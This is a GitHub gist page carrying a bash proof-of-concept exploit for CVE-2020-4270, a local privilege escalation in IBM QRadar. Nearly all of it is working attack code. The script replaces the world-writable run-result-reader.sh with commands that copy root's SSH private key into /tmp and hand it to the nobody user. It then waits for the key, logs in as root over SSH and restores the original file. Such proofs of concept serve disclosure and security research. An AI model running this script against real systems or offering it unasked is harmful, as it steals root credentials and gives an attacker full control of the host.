Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Local privilege escalation in QRadar due to run-result-reader.sh insecure file permissions (CVE-2020-4270) proof of concept
#!/bin/bash
trap cleanup INT
function cleanup()
{
if [ -f /tmp/run-result-reader.sh ]
then
/usr/bin/cat /tmp/run-result-reader.sh > /opt/qvm/iem/bin/run-result-reader.sh
/usr/bin/rm -f /tmp/run-result-reader.sh
fi
if [ -f /tmp/id_rsa ]
then
/usr/bin/rm -f /tmp/id_rsa
fi
}
if [ ! -f /tmp/run-result-reader.sh ]
then
/usr/bin/cp /opt/qvm/iem/bin/run-result-reader.sh /tmp/run-result-reader.sh
/usr/bin/cat > /opt/qvm/iem/bin/run-result-reader.sh << __EOF__
#!/bin/sh
/usr/bin/cp /root/.ssh/id_rsa /tmp/
/usr/bin/chown nobody.nobody /tmp/id_rsa
__EOF__
fi
echo "Please wait..."
while [ 1 ]
do
if [ -f /tmp/id_rsa ]
then
/usr/bin/ssh -i /tmp/id_rsa root@localhost
cleanup
exit 0
fi
/usr/bin/sleep 60
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.